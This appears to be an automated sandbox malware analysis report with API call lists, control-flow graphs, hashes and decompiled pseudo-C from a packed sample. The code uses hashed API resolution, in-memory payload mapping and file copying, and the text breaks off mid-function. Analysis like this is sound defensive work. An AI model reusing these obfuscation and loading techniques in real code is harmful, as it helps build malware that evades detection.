                                                        • __vbaCheckTypeVar.MSVBVM60(?,00411A18), ref: 00422D1F
                                                        • __vbaVarLateMemCallLd.MSVBVM60(?,?,hwnd,00000000), ref: 00422D3C
                                                        • __vbaI4Var.MSVBVM60(?,00000001,?), ref: 00422D62
                                                        • __vbaI4Var.MSVBVM60(?,00000000), ref: 00422D6C
                                                        • __vbaSetSystemError.MSVBVM60(00000000), ref: 00422D7A
                                                        • __vbaFreeVar.MSVBVM60 ref: 00422D88
                                                        • __vbaVarMove.MSVBVM60 ref: 00422DB9
                                                        • __vbaSetSystemError.MSVBVM60(-00000004,?,00000001), ref: 00422DDD
                                                        • __vbaFreeVar.MSVBVM60(00422E30), ref: 00422E10
                                                        • __vbaFreeVar.MSVBVM60 ref: 00422E15
                                                        • __vbaFreeVar.MSVBVM60 ref: 00422E1A
                                                        • __vbaFreeStr.MSVBVM60 ref: 00422E1F
                                                        • __vbaFreeVar.MSVBVM60 ref: 00422E28
                                                        • __vbaErrorOverflow.MSVBVM60(?,?,?,00000019,72A0C33A), ref: 00422E47
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Free$Error$System$List$Move$CallCheckLateNofreeOverflowTypeVarg
                                                        • String ID: hwnd
                                                        • API String ID: 2059686369-1070177613
                                                        • Opcode ID: 2f492016b26e4457f4250573f2c6ec222418582bb05ae5cdf28aff983abd056d
                                                        • Instruction ID: 23fcae3a1f162950d6ace3d42bd84e4bbed8cba36ac589c416da33b1d5dbda45
                                                        • Opcode Fuzzy Hash: 2f492016b26e4457f4250573f2c6ec222418582bb05ae5cdf28aff983abd056d
                                                        • Instruction Fuzzy Hash: 22A15DB0E00229ABDB20DF65DD45BDDB7B8BF44344F4085AAE409B7250DBB85A88CF55
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00401D25,00000000,?,00401610,?), ref: 004226B4
                                                        • __vbaAryLock.MSVBVM60(?,00000000), ref: 004226C7
                                                        • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401D26), ref: 004226EF
                                                        • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401D26), ref: 004226FC
                                                        • __vbaAryLock.MSVBVM60(?,?), ref: 00422709
                                                        • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401D26), ref: 00422728
                                                        • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401D26), ref: 00422731
                                                        • __vbaSetSystemError.MSVBVM60(?,?,00401D26), ref: 00422751
                                                        • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00422761
                                                        • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00422767
                                                        • __vbaAryMove.MSVBVM60(?,?), ref: 00422771
                                                        • __vbaAryDestruct.MSVBVM60(00000000,?,004227B0), ref: 004227A9
                                                        • __vbaErrorOverflow.MSVBVM60(00000000,?,00401610,?,?,?,?,?,?,?,?,00000000,00401D26,?), ref: 004227C6
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Error$BoundsGenerate$LockUnlock$DestructMoveOverflowRedimSystem
                                                        • String ID:
                                                        • API String ID: 1650229119-0
                                                        • Opcode ID: a4d49285ffdaf3bf251c925da12021fbf1b2636bc16d54831f22787ec9c3e71c
                                                        • Instruction ID: 5bcb73a249b99ed0406a2e9b3568af4946de10a5941a691269fdbdf231264a20
                                                        • Opcode Fuzzy Hash: a4d49285ffdaf3bf251c925da12021fbf1b2636bc16d54831f22787ec9c3e71c
                                                        • Instruction Fuzzy Hash: C0414F75A00218AFCF04DF94DE85EAEF7B9FF88700F50415AE901B7250D7B5A941CBA9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 603 3f8400-3f84df 604 3f84e3-3f84e9 603->604 605 3f84ef 604->605 606 3f85c8-3f85ce 604->606 607 3f866c-3f86b4 call 3fb6e0 605->607 608 3f84f5-3f84fb 605->608 609 3f8630-3f8637 606->609 610 3f85d0-3f85d6 606->610 621 3f85bd-3f85c7 607->621 633 3f86ba 607->633 613 3f84fd-3f8503 608->613 614 3f854a-3f8551 608->614 611 3f8639-3f864f call 3f3f00 call 3f3e60 609->611 612 3f8654-3f8667 609->612 615 3f85d8-3f85e0 610->615 616 3f85b1-3f85b7 610->616 611->612 612->604 622 3f8505-3f850b 613->622 623 3f8543-3f8548 613->623 619 3f856e-3f8591 614->619 620 3f8553-3f8569 call 3f3f00 call 3f3e60 614->620 624 3f85e2-3f85fa call 3f3f00 call 3f3e60 615->624 625 3f8600-3f8624 CreateFileW 615->625 616->604 616->621 642 3f85ae 619->642 643 3f8593-3f85a9 call 3f3f00 call 3f3e60 619->643 620->619 622->616 631 3f8511-3f8518 622->631 623->604 624->625 625->621 627 3f8626-3f862b 625->627 627->604 638 3f851a-3f8530 call 3f3f00 call 3f3e60 631->638 639 3f8535-3f8541 631->639 634 3f86bc-3f86be 633->634 635 3f86c4-3f86d1 633->635 634->621 634->635 638->639 639->604 642->616 643->642
                                                        C-Code - Quality: 66%
                                                        			E003F8400(void* __ebx, void* __ebp) {
                                                        				short _v524;
                                                        				char _v564;
                                                        				char _v572;
                                                        				struct _SECURITY_ATTRIBUTES* _v576;
                                                        				signed int _v580;
                                                        				signed int _v584;
                                                        				signed int _v588;
                                                        				signed int _v592;
                                                        				intOrPtr _v596;
                                                        				intOrPtr* _t75;
                                                        				intOrPtr* _t82;
                                                        				intOrPtr* _t85;
                                                        				void* _t92;
                                                        				intOrPtr* _t93;
                                                        				void* _t95;
                                                        				void* _t97;
                                                        				void* _t98;
                                                        				void* _t99;
                                                        				void* _t100;
                                                        				void* _t101;
                                                        				signed int _t119;
                                                        				void* _t121;
                                                        				void* _t122;
                                                        				signed int _t123;
                                                        				intOrPtr _t124;
                                                        				void* _t126;
                                                        				void* _t129;
                                                        
                                                        				_t126 = __ebp;
                                                        				_t101 = __ebx;
                                                        				_v584 = 0xdbec;
                                                        				_v584 = _v584 + 0xa437;
                                                        				_v584 = _v584 | 0x0afcf5fb;
                                                        				_v584 = _v584 ^ 0x9493ba05;
                                                        				_v584 = _v584 >> 0xc;
                                                        				_v584 = _v584 >> 0xb;
                                                        				_v584 = _v584 ^ 0x000001bc;
                                                        				_v592 = 0x7d19;
                                                        				_v592 = _v592 << 9;
                                                        				_v592 = _v592 >> 0xe;
                                                        				_v592 = _v592 + 0xffff07e5;
                                                        				_v592 = _v592 | 0x8aea6eef;
                                                        				_v592 = _v592 + 0xd867;
                                                        				_v592 = _v592 + 0x9c41;
                                                        				_v592 = _v592 + 0x3de0;
                                                        				_v592 = _v592 + 0x218b;
                                                        				_v592 = _v592 ^ 0x00014403;
                                                        				_v588 = 0x2591;
                                                        				_t123 = 0x4a20241;
                                                        				_v588 = _v588 * 0x7d;
                                                        				_v588 = _v588 + 0x8d68;
                                                        				_v588 = _v588 + 0xffff8911;
                                                        				_v588 = _v588 * 0x6a;
                                                        				_v588 = _v588 + 0xffff93d5;
                                                        				_v588 = _v588 ^ 0x07a13cd2;
                                                        				_v580 = 0x789;
                                                        				_v580 = _v580 >> 1;
                                                        				_v580 = _v580 ^ 0xaee58af2;
                                                        				_v580 = _v580 ^ 0xaee58936;
                                                        				_t122 = _v580;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t129 = _t123 - 0x1aed34c4;
                                                        						if(_t129 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t129 == 0) {
                                                        							_v580 = 0xa8c00;
                                                        							_v576 = 0;
                                                        							_v596 = E003FB6E0(_v580, _v576, 0x989680, 0);
                                                        							_v592 = _t119;
                                                        							_t121 = _v588 - _v564;
                                                        							_t124 = _v596;
                                                        							asm("sbb ecx, [esp+0x3c]");
                                                        							__eflags = _v584 - _v592;
                                                        							if(__eflags < 0) {
                                                        								goto L16;
                                                        							} else {
                                                        								if(__eflags > 0) {
                                                        									L29:
                                                        									return 1;
                                                        								} else {
                                                        									__eflags = _t121 - _t124;
                                                        									if(_t121 < _t124) {
                                                        										goto L16;
                                                        									} else {
                                                        										goto L29;
                                                        									}
                                                        								}
                                                        							}
                                                        						} else {
                                                        							if(_t123 == 0x12f5064) {
                                                        								_t82 =  *0x3fdec0;
                                                        								__eflags = _t82;
                                                        								if(_t82 == 0) {
                                                        									_t99 = E003F3F00(0x9bab0b12);
                                                        									_t119 = 0x8b0c7279;
                                                        									_t82 = E003F3E60(_t101, _t99, 0x8b0c7279, _t126);
                                                        									 *0x3fdec0 = _t82;
                                                        								}
                                                        								 *_t82(_t122, 0,  &_v564, 0x28);
                                                        								asm("sbb esi, esi");
                                                        								_t85 =  *0x3fde3c;
                                                        								_t123 = (_t123 & 0xf96a5287) + 0x13ef6fdf;
                                                        								__eflags = _t85;
                                                        								if(_t85 == 0) {
                                                        									_t98 = E003F3F00(0x9bab0b12);
                                                        									_t119 = 0x20de7595;
                                                        									_t85 = E003F3E60(_t101, _t98, 0x20de7595, _t126);
                                                        									 *0x3fde3c = _t85;
                                                        								}
                                                        								 *_t85(_t122);
                                                        								goto L15;
                                                        							} else {
                                                        								if(_t123 == 0x4a20241) {
                                                        									_t123 = 0x33602029;
                                                        									continue;
                                                        								} else {
                                                        									if(_t123 != 0xd59c266) {
                                                        										goto L15;
                                                        									} else {
                                                        										_t93 =  *0x3fe1d4;
                                                        										if(_t93 == 0) {
                                                        											_t97 = E003F3F00(0x9bab0b12);
                                                        											_t119 = 0xa229df38;
                                                        											_t93 = E003F3E60(_t101, _t97, 0xa229df38, _t126);
                                                        											 *0x3fe1d4 = _t93;
                                                        										}
                                                        										 *_t93( &_v572);
                                                        										_t123 = 0x1aed34c4;
                                                        										continue;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L30:
                                                        					}
                                                        					__eflags = _t123 - 0x33602029;
                                                        					if(_t123 == 0x33602029) {
                                                        						_t75 =  *0x3fe3f4;
                                                        						__eflags = _t75;
                                                        						if(_t75 == 0) {
                                                        							_t100 = E003F3F00(0x9bab0b12);
                                                        							_t119 = 0x7dc9b9bb;
                                                        							_t75 = E003F3E60(_t101, _t100, 0x7dc9b9bb, _t126);
                                                        							 *0x3fe3f4 = _t75;
                                                        						}
                                                        						 *_t75(0,  &_v524, 0x104);
                                                        						_t123 = 0x3ae77736;
                                                        						goto L1;
                                                        					} else {
                                                        						__eflags = _t123 - 0x3ae77736;
                                                        						if(_t123 != 0x3ae77736) {
                                                        							goto L15;
                                                        						} else {
                                                        							__eflags =  *0x3fde04;
                                                        							if( *0x3fde04 == 0) {
                                                        								_t95 = E003F3F00(0x9bab0b12);
                                                        								_t119 = 0xb66d748a;
                                                        								 *0x3fde04 = E003F3E60(_t101, _t95, 0xb66d748a, _t126);
                                                        							}
                                                        							_t92 = CreateFileW( &_v524, _v584, _v592, 0, _v588, _v580, 0); // executed
                                                        							_t122 = _t92;
                                                        							__eflags = _t122 - 0xffffffff;
                                                        							if(_t122 == 0xffffffff) {
                                                        								break;
                                                        							} else {
                                                        								_t123 = 0x12f5064;
                                                        								goto L1;
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L30;
                                                        					L15:
                                                        					__eflags = _t123 - 0x13ef6fdf;
                                                        				} while (_t123 != 0x13ef6fdf);
                                                        				L16:
                                                        				__eflags = 0;
                                                        				return 0;
                                                        				goto L30;
                                                        			}






























                                                        0x003f8400
                                                        0x003f8400
                                                        0x003f8406
                                                        0x003f840e
                                                        0x003f8416
                                                        0x003f841e
                                                        0x003f8426
                                                        0x003f842b
                                                        0x003f8430
                                                        0x003f8438
                                                        0x003f8440
                                                        0x003f8445
                                                        0x003f844a
                                                        0x003f8452
                                                        0x003f845a
                                                        0x003f8462
                                                        0x003f846a
                                                        0x003f8472
                                                        0x003f847a
                                                        0x003f8482
                                                        0x003f8491
                                                        0x003f8496
                                                        0x003f849a
                                                        0x003f84a2
                                                        0x003f84af
                                                        0x003f84b3
                                                        0x003f84bb
                                                        0x003f84c3
                                                        0x003f84cb
                                                        0x003f84cf
                                                        0x003f84d7
                                                        0x003f84df
                                                        0x003f84df
                                                        0x003f84e3
                                                        0x003f84e3
                                                        0x003f84e3
                                                        0x003f84e3
                                                        0x003f84e9
                                                        0x00000000
                                                        0x00000000
                                                        0x003f84ef
                                                        0x003f866e
                                                        0x003f8676
                                                        0x003f8696
                                                        0x003f869a
                                                        0x003f86a2
                                                        0x003f86a6
                                                        0x003f86aa
                                                        0x003f86b2
                                                        0x003f86b4
                                                        0x00000000
                                                        0x003f86ba
                                                        0x003f86ba
                                                        0x003f86c5
                                                        0x003f86d1
                                                        0x003f86bc
                                                        0x003f86bc
                                                        0x003f86be
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x003f86be
                                                        0x003f86ba
                                                        0x003f84f5
                                                        0x003f84fb
                                                        0x003f854a
                                                        0x003f854f
                                                        0x003f8551
                                                        0x003f8558
                                                        0x003f855d
                                                        0x003f8564
                                                        0x003f8569
                                                        0x003f8569
                                                        0x003f8578
                                                        0x003f857c
                                                        0x003f857e
                                                        0x003f8589
                                                        0x003f858f
                                                        0x003f8591
                                                        0x003f8598
                                                        0x003f859d
                                                        0x003f85a4
                                                        0x003f85a9
                                                        0x003f85a9
                                                        0x003f85af
                                                        0x00000000
                                                        0x003f84fd
                                                        0x003f8503
                                                        0x003f8543
                                                        0x00000000
                                                        0x003f8505
                                                        0x003f850b
                                                        0x00000000
                                                        0x003f8511
                                                        0x003f8511
                                                        0x003f8518
                                                        0x003f851f
                                                        0x003f8524
                                                        0x003f852b
                                                        0x003f8530
                                                        0x003f8530
                                                        0x003f853a
                                                        0x003f853c
                                                        0x00000000
                                                        0x003f853c
                                                        0x003f850b
                                                        0x003f8503
                                                        0x003f84fb
                                                        0x00000000
                                                        0x003f84ef
                                                        0x003f85c8
                                                        0x003f85ce
                                                        0x003f8630
                                                        0x003f8635
                                                        0x003f8637
                                                        0x003f863e
                                                        0x003f8643
                                                        0x003f864a
                                                        0x003f864f
                                                        0x003f864f
                                                        0x003f8660
                                                        0x003f8662
                                                        0x00000000
                                                        0x003f85d0
                                                        0x003f85d0
                                                        0x003f85d6
                                                        0x00000000
                                                        0x003f85d8
                                                        0x003f85de
                                                        0x003f85e0
                                                        0x003f85e7
                                                        0x003f85ec
                                                        0x003f85fa
                                                        0x003f85fa
                                                        0x003f861d
                                                        0x003f861f
                                                        0x003f8621
                                                        0x003f8624
                                                        0x00000000
                                                        0x003f8626
                                                        0x003f8626
                                                        0x00000000
                                                        0x003f8626
                                                        0x003f8624
                                                        0x003f85d6
                                                        0x00000000
                                                        0x003f85b1
                                                        0x003f85b1
                                                        0x003f85b1
                                                        0x003f85bd
                                                        0x003f85bd
                                                        0x003f85c7
                                                        0x00000000

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE), ref: 003F861D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256698017.00000000003F1000.00000020.00000001.sdmp, Offset: 003F0000, based on PE: true
                                                        • Associated: 00000007.00000002.2256695140.00000000003F0000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256705457.00000000003FD000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256709121.00000000003FF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_3f0000_tmp_e473b4.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID: ) `3$) `3$6w:$6w:$=
                                                        • API String ID: 823142352-4124229693
                                                        • Opcode ID: 9866f31003916de013eb7d8919ff56aed469f561282cf32aee44b9520d542ae7
                                                        • Instruction ID: f795a1206aa5423e03f9cf3adf433ec086bb72a190e35365588bd7ac4aacc13f
                                                        • Opcode Fuzzy Hash: 9866f31003916de013eb7d8919ff56aed469f561282cf32aee44b9520d542ae7
                                                        • Instruction Fuzzy Hash: 6561E571A083159FC71ADF68C44567FBBE5ABA0714F00881DF6998B2A0DB78DD08CF82
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 658 3e0d60-3e0dd5 call 3e0ed0 VirtualAlloc RtlMoveMemory 662 3e0ebe-3e0ec4 658->662 663 3e0ddb-3e0dde 658->663 663->662 664 3e0de4-3e0de6 663->664 664->662 665 3e0dec-3e0df0 664->665 665->662 667 3e0df6-3e0dfd 665->667 668 3e0eaf-3e0ebb 667->668 669 3e0e03-3e0e36 call 3e1140 RtlMoveMemory 667->669 669->662 673 3e0e3c-3e0e4a VirtualAlloc 669->673 674 3e0e4c-3e0e52 673->674 675 3e0e89-3e0ea0 RtlFillMemory 673->675 676 3e0e5a-3e0e68 674->676 677 3e0e54-3e0e56 674->677 675->662 681 3e0ea2-3e0ea5 675->681 676->662 679 3e0e6a-3e0e7d RtlMoveMemory 676->679 677->676 679->662 680 3e0e7f-3e0e83 679->680 680->662 682 3e0e85 680->682 681->662 683 3e0ea7-3e0ea9 681->683 682->675 683->668 683->669
                                                        APIs
                                                          • Part of subcall function 003E0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 003E0F08
                                                          • Part of subcall function 003E0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 003E0F3E
                                                          • Part of subcall function 003E0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 003E0F7F
                                                        • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 003E0DB4
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 003E0DC3
                                                          • Part of subcall function 003E1140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,003E0EFD,00000000), ref: 003E1155
                                                        • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 003E0E11
                                                        • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 003E0E3D
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 003E0E6C
                                                        • RtlFillMemory.KERNEL32(00000000,?,00000000), ref: 003E0E98
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256690931.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_3e0000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: Memory$Move$AllocVirtual$Filllstrcpyn
                                                        • String ID:
                                                        • API String ID: 3581289920-0
                                                        • Opcode ID: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                        • Instruction ID: a87b73b8257e279d43e42b426a9f1cecad3e22117c6b5a7637c289f792f6fd94
                                                        • Opcode Fuzzy Hash: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                        • Instruction Fuzzy Hash: 3531C572A043905BD729DB62CC44AAF73E9EBC8381F040E2CB549D7395D6B5D9C18B61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 684 3f3780-3f3793 685 3f3795-3f37ab call 3f3f00 call 3f3e60 684->685 686 3f37b0-3f37c5 684->686 685->686 690 3f37c7-3f37dd call 3f3f00 call 3f3e60 686->690 691 3f37e2-3f37fa 686->691 690->691 698 3f37fc-3f3812 call 3f3f00 call 3f3e60 691->698 699 3f3817-3f3832 691->699 698->699 704 3f384f-3f385e 699->704 705 3f3834-3f384a call 3f3f00 call 3f3e60 699->705 712 3f387b-3f38b4 704->712 713 3f3860-3f3876 call 3f3f00 call 3f3e60 704->713 705->704 718 3f38b6-3f38cc call 3f3f00 call 3f3e60 712->718 719 3f38d1-3f38e2 SHFileOperationW 712->719 713->712 718->719
                                                        C-Code - Quality: 62%
                                                        			E003F3780(void* __ecx, void* __edx, void* __edi, void* __esi) {
                                                        				char _v520;
                                                        				char _v528;
                                                        				char _v536;
                                                        				char _v1040;
                                                        				char _v1056;
                                                        				short _v1072;
                                                        				char* _v1076;
                                                        				char* _v1080;
                                                        				intOrPtr _v1084;
                                                        				intOrPtr* _t12;
                                                        				intOrPtr* _t14;
                                                        				intOrPtr* _t16;
                                                        				intOrPtr* _t18;
                                                        				intOrPtr* _t20;
                                                        				signed int _t26;
                                                        				void* _t36;
                                                        				void* _t63;
                                                        				void* _t66;
                                                        				void* _t69;
                                                        				void* _t70;
                                                        				void* _t71;
                                                        				void* _t72;
                                                        				struct _SHFILEOPSTRUCTW* _t73;
                                                        
                                                        				_t70 =  &_v1072;
                                                        				_t12 =  *0x3fddc0;
                                                        				_t66 = __ecx;
                                                        				_t63 = __edx;
                                                        				if(_t12 == 0) {
                                                        					_t12 = E003F3E60(_t36, E003F3F00(0xc6fbcd74), 0x7e0ae558, _t69);
                                                        					 *0x3fddc0 = _t12;
                                                        				}
                                                        				 *_t12( &_v1072, 0, 0x1e);
                                                        				_t14 =  *0x3fddc0;
                                                        				_t71 = _t70 + 0xc;
                                                        				if(_t14 == 0) {
                                                        					_t14 = E003F3E60(_t36, E003F3F00(0xc6fbcd74), 0x7e0ae558, _t69);
                                                        					 *0x3fddc0 = _t14;
                                                        				}
                                                        				 *_t14( &_v1040, 0, 0x208);
                                                        				_t16 =  *0x3fddc0;
                                                        				_t72 = _t71 + 0xc;
                                                        				if(_t16 == 0) {
                                                        					_t16 = E003F3E60(_t36, E003F3F00(0xc6fbcd74), 0x7e0ae558, _t69);
                                                        					 *0x3fddc0 = _t16;
                                                        				}
                                                        				 *_t16( &_v520, 0, 0x208);
                                                        				_t18 =  *0x3fe298;
                                                        				_t73 = _t72 + 0xc;
                                                        				if(_t18 == 0) {
                                                        					_t18 = E003F3E60(_t36, E003F3F00(0x9bab0b12), 0xba782e65, _t69);
                                                        					 *0x3fe298 = _t18;
                                                        				}
                                                        				 *_t18( &_v1040, _t66);
                                                        				_t20 =  *0x3fe298;
                                                        				if(_t20 == 0) {
                                                        					_t20 = E003F3E60(_t36, E003F3F00(0x9bab0b12), 0xba782e65, _t69);
                                                        					 *0x3fe298 = _t20;
                                                        				}
                                                        				 *_t20( &_v528, _t63);
                                                        				_v1084 = 1;
                                                        				_v1080 =  &_v1056;
                                                        				_v1076 =  &_v536;
                                                        				_v1072 = 0xe14;
                                                        				if( *0x3fe30c == 0) {
                                                        					 *0x3fe30c = E003F3E60(_t36, E003F3F00(0xd9518805), 0x262a6194, _t69);
                                                        				}
                                                        				_t26 = SHFileOperationW(_t73); // executed
                                                        				asm("sbb eax, eax");
                                                        				return  ~_t26 + 1;
                                                        			}


























                                                        0x003f3785
                                                        0x003f3780
                                                        0x003f378c
                                                        0x003f378f
                                                        0x003f3793
                                                        0x003f37a6
                                                        0x003f37ab
                                                        0x003f37ab
                                                        0x003f37b9
                                                        0x003f37bb
                                                        0x003f37c0
                                                        0x003f37c5
                                                        0x003f37d8
                                                        0x003f37dd
                                                        0x003f37dd
                                                        0x003f37ee
                                                        0x003f37f0
                                                        0x003f37f5
                                                        0x003f37fa
                                                        0x003f380d
                                                        0x003f3812
                                                        0x003f3812
                                                        0x003f3826
                                                        0x003f3828
                                                        0x003f382d
                                                        0x003f3832
                                                        0x003f3845
                                                        0x003f384a
                                                        0x003f384a
                                                        0x003f3855
                                                        0x003f3857
                                                        0x003f385e
                                                        0x003f3871
                                                        0x003f3876
                                                        0x003f3876
                                                        0x003f3884
                                                        0x003f388a
                                                        0x003f3892
                                                        0x003f389d
                                                        0x003f38a6
                                                        0x003f38b4
                                                        0x003f38cc
                                                        0x003f38cc
                                                        0x003f38d5
                                                        0x003f38d9
                                                        0x003f38e2

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256698017.00000000003F1000.00000020.00000001.sdmp, Offset: 003F0000, based on PE: true
                                                        • Associated: 00000007.00000002.2256695140.00000000003F0000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256705457.00000000003FD000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256709121.00000000003FF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_3f0000_tmp_e473b4.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileOperation
                                                        • String ID: X~$X~$X~
                                                        • API String ID: 3080627654-3258893172
                                                        • Opcode ID: b1167d3f5d7ea67edebb1e88cad38a88e9d3f770a5449d1c4e1111005eca55c9
                                                        • Instruction ID: 7c384cc3199b6d099e326663e44edb2ff8dd56d6d3a14bd85699e4b51bcb176d
                                                        • Opcode Fuzzy Hash: b1167d3f5d7ea67edebb1e88cad38a88e9d3f770a5449d1c4e1111005eca55c9
                                                        • Instruction Fuzzy Hash: 1731BCB16003495BD716ABB9DC05BBB37EAAF94704F00092DFA15CB2A5EB34DA05C791
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 726 3f7120 727 3f7125-3f712a 726->727 728 3f71b4-3f71b9 727->728 729 3f7130 727->729 732 3f71bb 728->732 733 3f7207-3f720c 728->733 730 3f7136-3f713b 729->730 731 3f7233-3f7248 call 3f34c0 729->731 736 3f713d 730->736 737 3f7190-3f7195 730->737 756 3f724a-3f7260 call 3f3f00 call 3f3e60 731->756 757 3f7265-3f7278 LoadLibraryW 731->757 739 3f71ee-3f7202 call 3f7080 732->739 740 3f71bd-3f71c2 732->740 734 3f720e-3f7222 call 3f7080 733->734 735 3f7227-3f722c 733->735 734->727 735->727 744 3f7232 735->744 745 3f713f-3f7144 736->745 746 3f717a-3f718e call 3f7080 736->746 737->735 743 3f719b-3f71af call 3f7080 737->743 739->727 748 3f71d5-3f71e9 call 3f7080 740->748 749 3f71c4-3f71c9 740->749 743->727 754 3f7146-3f714b 745->754 755 3f7164-3f7178 call 3f7080 745->755 746->727 748->727 749->735 758 3f71cb-3f71d0 749->758 754->735 766 3f7151-3f7162 call 3f7080 754->766 755->727 756->757 762 3f727a-3f7290 call 3f3f00 call 3f3e60 757->762 763 3f7295-3f72a0 757->763 758->727 762->763 778 3f72bd-3f72c5 763->778 779 3f72a2-3f72b8 call 3f3f00 call 3f3e60 763->779 766->727 779->778
                                                        C-Code - Quality: 85%
                                                        			E003F7120(void* __ebx) {
                                                        				void* _t2;
                                                        				struct HINSTANCE__* _t8;
                                                        				intOrPtr* _t9;
                                                        				intOrPtr* _t11;
                                                        				void* _t21;
                                                        				intOrPtr _t23;
                                                        				void* _t48;
                                                        				WCHAR* _t51;
                                                        				void* _t53;
                                                        				void* _t54;
                                                        				void* _t55;
                                                        
                                                        				_t21 = __ebx;
                                                        				_t2 = 0x291da748;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t54 = _t2 - 0x1a8031ec;
                                                        						if(_t54 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t54 == 0) {
                                                        							_t51 = E003F34C0(0x3fd830);
                                                        							__eflags =  *0x3fdd1c;
                                                        							if( *0x3fdd1c == 0) {
                                                        								 *0x3fdd1c = E003F3E60(_t21, E003F3F00(0x9bab0b12), 0xe4b28d97, _t53);
                                                        							}
                                                        							_t8 = LoadLibraryW(_t51);
                                                        							_t23 =  *0x3fe548; // 0x598118
                                                        							 *(_t23 + 0x4c) = _t8;
                                                        							_t9 =  *0x3fe494;
                                                        							__eflags = _t9;
                                                        							if(_t9 == 0) {
                                                        								_t9 = E003F3E60(_t21, E003F3F00(0x9bab0b12), 0x7facde30, _t53);
                                                        								 *0x3fe494 = _t9;
                                                        							}
                                                        							_t48 =  *_t9();
                                                        							_t11 =  *0x3fdf30;
                                                        							__eflags = _t11;
                                                        							if(_t11 == 0) {
